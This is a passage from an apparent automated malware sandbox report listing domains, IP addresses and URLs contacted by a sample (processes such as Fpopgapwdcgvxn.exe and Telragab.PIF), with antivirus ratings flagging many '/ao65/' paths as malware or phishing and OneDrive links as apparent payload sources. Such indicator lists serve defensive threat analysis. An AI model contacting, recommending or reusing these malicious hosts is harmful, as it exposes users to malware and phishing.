              http://www.kermisbedrijfkramer.online/ao65/www.stellarskyline.com100%Avira URL Cloudmalware
              http://www.optimusvisionlb.com/ao65/100%Avira URL Cloudmalware
              http://www.kermisbedrijfkramer.online100%Avira URL Cloudphishing
              http://www.stellarskyline.com0%Avira URL Cloudsafe
              http://www.harmonicod.com/ao65/4%VirustotalBrowse
              http://www.ecofare.xyz/ao65/2%VirustotalBrowse
              http://www.optimusvisionlb.com/ao65/2%VirustotalBrowse
              http://www.canwealljustagree.com/ao65/10%VirustotalBrowse
              http://www.sprockettrucking.com/ao65/www.leathfortexas.com100%Avira URL Cloudmalware
              http://www.kermisbedrijfkramer.online/ao65/?3f94p=Y9yn8u0REY9c1IpGc1acQeiywl67Bz4kR9nr06rl/WLBU1XMoiFOUgbvS2/Y+YwQBdR3MSzENA==&ojq4i=mFNh5n78I22D3DgP100%Avira URL Cloudmalware
              http://www.thnkotb.comReferer:0%Avira URL Cloudsafe
              http://www.stellarskyline.com0%VirustotalBrowse
              http://www.ouxodb001.cfdReferer:0%Avira URL Cloudsafe
              http://www.stellarskyline.com/ao65/?3f94p=VAHOj8ipz1NvM3cWmHPyRmFT7dV4XaBrhkZucwTvHTdt+uk8nfyPBl3lilEqIH7Lfnspwggtew==&ojq4i=mFNh5n78I22D3DgP100%Avira URL Cloudmalware
              http://www.1techtrendzstore.com/ao65/www.kuis-raja-borong.website100%Avira URL Cloudmalware
              http://www.thnkotb.com0%VirustotalBrowse
              http://www.hivaom.top/ao65/www.canwealljustagree.com100%Avira URL Cloudphishing
              http://www.ouxodb001.cfd/ao65/www.optimusvisionlb.com100%Avira URL Cloudmalware
              http://www.maltsky.netReferer:0%Avira URL Cloudsafe
              http://www.kermisbedrijfkramer.online1%VirustotalBrowse
              http://www.1techtrendzstore.com/ao65/100%Avira URL Cloudmalware
              http://www.maltsky.net/ao65/?3f94p=U+zAKk5GFPF9sXmyHB7CBujsr49+ry/l09LFQEQGSX0L4+hNQ2paLAM2kd/yuXu6AcnnHpW1KQ==&ojq4i=mFNh5n78I22D3DgP100%Avira URL Cloudmalware
              http://www.optimusvisionlb.com/ao65/www.maltsky.net100%Avira URL Cloudmalware
              http://www.1techtrendzstore.com/ao65/2%VirustotalBrowse
              www.hivaom.top/ao65/100%Avira URL Cloudphishing
              http://www.optimusvisionlb.com/ao65/?3f94p=Olh8eEjR5IT46fH2PeVd1Lc15fw8Z1PVOirT2eqb4t/bi7TTuO6yJGtOPy5w7PRh9e2z8DbdcQ==&ojq4i=mFNh5n78I22D3DgP100%Avira URL Cloudmalware
              http://www.leathfortexas.com0%Avira URL Cloudsafe
              http://www.stellarskyline.com/ao65/www.hivaom.top100%Avira URL Cloudmalware
              http://www.oaistetic.com0%Avira URL Cloudsafe
              http://www.leathfortexas.com/ao65/100%Avira URL Cloudmalware
              http://www.sprockettrucking.com0%Avira URL Cloudsafe
              http://www.hivaom.top/ao65/?3f94p=B3GcozZs3ohtof+Eq3ZwUrCdoNWOjNCPbyllHAjlOtmwH5sozkgIB7xqH4//btWoobo3GMsY9g==&ojq4i=mFNh5n78I22D3DgP100%Avira URL Cloudphishing
              www.hivaom.top/ao65/2%VirustotalBrowse
              http://www.kermisbedrijfkramer.online/ao65/100%Avira URL Cloudmalware
              http://www.leathfortexas.com/ao65/6%VirustotalBrowse
              http://www.kuis-raja-borong.website/ao65/100%Avira URL Cloudmalware
              http://www.hivaom.top/ao65/100%Avira URL Cloudphishing
              http://www.sprockettrucking.com1%VirustotalBrowse
              http://www.ecofare.xyzReferer:0%Avira URL Cloudsafe
              http://www.sprockettrucking.comReferer:0%Avira URL Cloudsafe
              http://www.kuis-raja-borong.website/ao65/www.oaistetic.com100%Avira URL Cloudmalware
              http://www.harmonicod.com/ao65/?3f94p=SIOjWgUx9Sz9T19JihLVHEMNoaK2maww+N41rkYkWun2OwaoSexibxzMqiX45PItRVwWmDJ2nA==&ojq4i=mFNh5n78I22D3DgP100%Avira URL Cloudmalware
              http://www.ouxodb001.cfd0%Avira URL Cloudsafe
              http://www.leathfortexas.com3%VirustotalBrowse
              http://www.sprockettrucking.com/ao65/100%Avira URL Cloudmalware
              http://www.hivaom.top/ao65/2%VirustotalBrowse
              http://www.kuis-raja-borong.websiteReferer:0%Avira URL Cloudsafe
              http://www.canwealljustagree.com100%Avira URL Cloudmalware
              http://www.maltsky.net/ao65/www.thnkotb.com100%Avira URL Cloudmalware
              http://www.kermisbedrijfkramer.online/ao65/4%VirustotalBrowse
              http://www.harmonicod.comReferer:0%Avira URL Cloudsafe
              http://www.ecofare.xyz0%Avira URL Cloudsafe
              http://www.optimusvisionlb.comReferer:0%Avira URL Cloudsafe
              http://www.ouxodb001.cfd1%VirustotalBrowse
              http://www.ecofare.xyz/ao65/www.iokgw1.top100%Avira URL Cloudphishing
              http://www.kuis-raja-borong.website0%Avira URL Cloudsafe
              http://www.oaistetic.com/ao65/100%Avira URL Cloudmalware
              http://www.optimusvisionlb.com0%Avira URL Cloudsafe
              http://www.leathfortexas.comReferer:0%Avira URL Cloudsafe
              http://www.leathfortexas.com/ao65/?3f94p=ys1nmsb6X1mQM1Jd478oiUQn9vuATHYUt4Dy8pL3kyVIlzOboPcsTdVyW5SVB7hST99gmWn6+w==&ojq4i=mFNh5n78I22D3DgP100%Avira URL Cloudmalware
              http://www.stellarskyline.com/ao65/100%Avira URL Cloudmalware
              http://www.stellarskyline.comReferer:0%Avira URL Cloudsafe
              http://www.canwealljustagree.com/ao65/www.ecofare.xyz100%Avira URL Cloudmalware
              http://www.leathfortexas.com/ao65/www.ouxodb001.cfd100%Avira URL Cloudmalware
              http://www.maltsky.net/ao65/100%Avira URL Cloudmalware
              http://www.thnkotb.com/ao65/www.harmonicod.com100%Avira URL Cloudmalware

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              leathfortexas.com
              		3.33.130.190
              		truetrueunknown
              thnkotb.com
              		3.33.130.190
              		truetrueunknown
              www.hivaom.top
              		156.237.159.158
              		truetrueunknown
              optimus-vision.odoo.com
              		34.93.103.39
              		truefalse
                		high
                www.maltsky.net
                		104.140.89.24
                		truetrueunknown
                kermisbedrijfkramer.online
                		37.97.254.27
                		truetrueunknown
                stellarskyline.com
                		62.72.50.88
                		truetrueunknown
                www.harmonicod.com
                		104.247.81.50
                		truetrueunknown
                www.thnkotb.com
                		unknown
                		unknowntrueunknown
                www.stellarskyline.com
                		unknown
                		unknowntrueunknown
                naopta.bn.files.1drv.com
                		unknown
                		unknownfalse
                  		high
                  onedrive.live.com
                  		unknown
                  		unknownfalse
                    		high
                    www.leathfortexas.com
                    		unknown
                    		unknowntrueunknown
                    www.sprockettrucking.com
                    		unknown
                    		unknowntrueunknown
                    www.ouxodb001.cfd
                    		unknown
                    		unknowntrueunknown
                    www.kermisbedrijfkramer.online
                    		unknown
                    		unknowntrueunknown
                    www.optimusvisionlb.com
                    		unknown
                    		unknowntrueunknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://www.kermisbedrijfkramer.online/ao65/?3f94p=Y9yn8u0REY9c1IpGc1acQeiywl67Bz4kR9nr06rl/WLBU1XMoiFOUgbvS2/Y+YwQBdR3MSzENA==&ojq4i=mFNh5n78I22D3DgPtrue
                    • Avira URL Cloud: malware
                    		unknown
                    http://www.stellarskyline.com/ao65/?3f94p=VAHOj8ipz1NvM3cWmHPyRmFT7dV4XaBrhkZucwTvHTdt+uk8nfyPBl3lilEqIH7Lfnspwggtew==&ojq4i=mFNh5n78I22D3DgPtrue
                    • Avira URL Cloud: malware
                    		unknown
                    http://www.maltsky.net/ao65/?3f94p=U+zAKk5GFPF9sXmyHB7CBujsr49+ry/l09LFQEQGSX0L4+hNQ2paLAM2kd/yuXu6AcnnHpW1KQ==&ojq4i=mFNh5n78I22D3DgPtrue
                    • Avira URL Cloud: malware
                    		unknown
                    www.hivaom.top/ao65/true
                    • 2%, Virustotal, Browse
                    • Avira URL Cloud: phishing
                    		low
                    http://www.optimusvisionlb.com/ao65/?3f94p=Olh8eEjR5IT46fH2PeVd1Lc15fw8Z1PVOirT2eqb4t/bi7TTuO6yJGtOPy5w7PRh9e2z8DbdcQ==&ojq4i=mFNh5n78I22D3DgPfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://www.hivaom.top/ao65/?3f94p=B3GcozZs3ohtof+Eq3ZwUrCdoNWOjNCPbyllHAjlOtmwH5sozkgIB7xqH4//btWoobo3GMsY9g==&ojq4i=mFNh5n78I22D3DgPtrue
                    • Avira URL Cloud: phishing
                    		unknown
                    http://www.harmonicod.com/ao65/?3f94p=SIOjWgUx9Sz9T19JihLVHEMNoaK2maww+N41rkYkWun2OwaoSexibxzMqiX45PItRVwWmDJ2nA==&ojq4i=mFNh5n78I22D3DgPtrue
                    • Avira URL Cloud: malware
                    		unknown
                    http://www.leathfortexas.com/ao65/?3f94p=ys1nmsb6X1mQM1Jd478oiUQn9vuATHYUt4Dy8pL3kyVIlzOboPcsTdVyW5SVB7hST99gmWn6+w==&ojq4i=mFNh5n78I22D3DgPtrue
                    • Avira URL Cloud: malware
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.canwealljustagree.com/ao65/explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmptrue
                    • 10%, Virustotal, Browse
                    • Avira URL Cloud: malware
                    		unknown
                    http://www.harmonicod.com/ao65/explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmptrue
                    • 4%, Virustotal, Browse
                    • Avira URL Cloud: malware
                    		unknown
                    http://www.canwealljustagree.comReferer:explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.thnkotb.comexplorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.hivaom.topReferer:explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                      		high
                      https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngFexplorer.exe, 00000005.00000002.4618835071.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                        		high
                        http://www.oaistetic.comReferer:explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.ecofare.xyz/ao65/explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmptrue
                        • 2%, Virustotal, Browse
                        • Avira URL Cloud: phishing
                        		unknown
                        https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000005.00000002.4618835071.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2334366335.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4623300730.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                          		high
                          http://www.kermisbedrijfkramer.online/ao65/www.stellarskyline.comexplorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          		unknown
                          http://www.optimusvisionlb.com/ao65/explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmptrue
                          • 2%, Virustotal, Browse
                          • Avira URL Cloud: malware
                          		unknown
                          https://naopta.bn.files.1drv.com/y4m4gdZgN9vpD5zAE34F6nOBodS76VsiZvQO69itA_Kz97aCmsmB5p4T1sYe5ZzwMe6Telragab.PIF, 0000000B.00000002.2686612744.00000000009A6000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://naopta.bn.files.1drv.com/y4mbKR8EFV2GjaLZUNxo34xSffY_nOEJNB-_msmauZ_D4C9ZlBli6oXkwvRloeD9ztdTelragab.PIF, 00000009.00000002.2579759920.00000000007E6000.00000004.00000020.00020000.00000000.sdmp, Telragab.PIF, 00000009.00000003.2578378839.0000000000742000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://www.kermisbedrijfkramer.onlineexplorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmptrue
                              • 1%, Virustotal, Browse
                              • Avira URL Cloud: phishing
                              		unknown
                              https://onedrive.live.com/download?rFpopgapwdcgvxn.exe, 00000000.00000003.2258996641.0000000000872000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://word.office.comMexplorer.exe, 00000005.00000002.4629484500.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2980040926.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2345200413.000000000C048000.00000004.00000001.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.stellarskyline.comexplorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                		unknown
                                https://naopta.bn.files.1drv.com/y4mkyT3e9ftNlbXtjIFcL8z3YMEEbeJfXibBwh-99Rm7Ot1eMTdDYyDRGAjFrO7mgVvFpopgapwdcgvxn.exe, 00000000.00000003.2258996641.0000000000886000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://transip.nl/explorer.exe, 00000005.00000002.4633580692.0000000010E6F000.00000004.80000000.00040000.00000000.sdmp, rundll32.exe, 00000006.00000002.4617256612.00000000052AF000.00000004.10000000.00040000.00000000.sdmpfalse
                                    		high
                                    https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-explorer.exe, 00000005.00000002.4618835071.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.sprockettrucking.com/ao65/www.leathfortexas.comexplorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameriexplorer.exe, 00000005.00000002.4618835071.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                        		high
                                        https://onedrive.live.com/Fpopgapwdcgvxn.exe, 00000000.00000003.2317987544.0000000000869000.00000004.00000020.00020000.00000000.sdmp, Fpopgapwdcgvxn.exe, 00000000.00000003.2258996641.0000000000866000.00000004.00000020.00020000.00000000.sdmp, Telragab.PIF, 00000009.00000003.2578378839.0000000000742000.00000004.00000020.00020000.00000000.sdmp, Telragab.PIF, 0000000B.00000002.2686612744.000000000095E000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.thnkotb.comReferer:explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://live.com/Telragab.PIF, 0000000B.00000002.2686612744.00000000009A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.ouxodb001.cfdReferer:explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://wns.windows.com/eexplorer.exe, 00000005.00000000.2336924818.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2979054042.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4623300730.00000000099AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.1techtrendzstore.com/ao65/www.kuis-raja-borong.websiteexplorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://www.hivaom.top/ao65/www.canwealljustagree.comexplorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: phishing
                                              		unknown
                                              https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.ouxodb001.cfd/ao65/www.optimusvisionlb.comexplorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                		unknown
                                                https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&ocexplorer.exe, 00000005.00000002.4618835071.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000005.00000002.4618835071.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.maltsky.netReferer:explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-explorer.exe, 00000005.00000002.4618835071.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.1techtrendzstore.com/ao65/explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • 2%, Virustotal, Browse
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://www.optimusvisionlb.com/ao65/www.maltsky.netexplorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://www.leathfortexas.comexplorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • 3%, Virustotal, Browse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://naopta.bn.files.1drv.com/y4mUDOC-1KaMFlmbquo_MCuV35VY0DNhAx1uT2j8j4iW_6OvPBYM_BkkkKs9VVlfZP7Telragab.PIF, 0000000B.00000002.2686612744.00000000009A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.stellarskyline.com/ao65/www.hivaom.topexplorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        		unknown
                                                        https://android.notify.windows.com/iOSexplorer.exe, 00000005.00000000.2345200413.000000000BFDF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4629484500.000000000BFDF000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://outlook.comeexplorer.exe, 00000005.00000002.4629484500.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2980040926.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2345200413.000000000C048000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexplorer.exe, 00000005.00000000.2336924818.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2979054042.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4623300730.00000000099AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-theexplorer.exe, 00000005.00000002.4618835071.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.oaistetic.comexplorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.leathfortexas.com/ao65/explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • 6%, Virustotal, Browse
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              http://www.sprockettrucking.comexplorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • 1%, Virustotal, Browse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://naopta.bn.files.1drv.com/y4mu7B-5fk8szYFW7t5U8GAGFWHz18vQ3lOohdWuW1sD9KC1dexn3z8c44A7Y_qMtHFFpopgapwdcgvxn.exe, 00000000.00000003.2317987544.0000000000812000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.kermisbedrijfkramer.online/ao65/explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                • 4%, Virustotal, Browse
                                                                • Avira URL Cloud: malware
                                                                		unknown
                                                                https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-explorer.exe, 00000005.00000002.4618835071.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.pmail.comFpopgapwdcgvxn.exe, Fpopgapwdcgvxn.exe, 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp, Fpopgapwdcgvxn.exe, 00000000.00000002.2322773738.00000000031B0000.00000004.00001000.00020000.00000000.sdmp, Telragab.PIF, 00000009.00000002.2582481668.0000000003180000.00000004.00001000.00020000.00000000.sdmp, Telragab.PIF, 0000000B.00000002.2688350100.00000000029C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://naopta.bn.files.1drv.com:443/y4mUDOC-1KaMFlmbquo_MCuV35VY0DNhAx1uT2j8j4iW_6OvPBYM_BkkkKs9VVlTelragab.PIF, 0000000B.00000002.2686612744.00000000009AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.hivaom.top/ao65/explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • 2%, Virustotal, Browse
                                                                      • Avira URL Cloud: phishing
                                                                      		unknown
                                                                      http://www.kuis-raja-borong.website/ao65/explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      		unknown
                                                                      https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 00000005.00000000.2334366335.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4623300730.000000000962B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.ecofare.xyzReferer:explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://www.sprockettrucking.comReferer:explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://naopta.bn.files.1drv.com/y4mb0GM36UMcQfEUiMpLP03Y8bvo9LtwS-BqKbXqgBYhMdWptkR9dr4YpWcIo8DgkasTelragab.PIF, 00000009.00000003.2546924486.0000000000796000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://api.msn.com/Iexplorer.exe, 00000005.00000000.2334366335.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4623300730.000000000962B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://naopta.bn.files.1drv.com/Fpopgapwdcgvxn.exe, 00000000.00000003.2317987544.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, Fpopgapwdcgvxn.exe, 00000000.00000003.2258996641.0000000000886000.00000004.00000020.00020000.00000000.sdmp, Telragab.PIF, 00000009.00000003.2578378839.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, Telragab.PIF, 00000009.00000003.2546924486.0000000000796000.00000004.00000020.00020000.00000000.sdmp, Telragab.PIF, 0000000B.00000002.2686612744.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, Telragab.PIF, 0000000B.00000003.2627665881.00000000009A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://www.kuis-raja-borong.website/ao65/www.oaistetic.comexplorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: malware
                                                                              		unknown
                                                                              http://www.ouxodb001.cfdexplorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              • 1%, Virustotal, Browse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://www.sprockettrucking.com/ao65/explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: malware
                                                                              		unknown
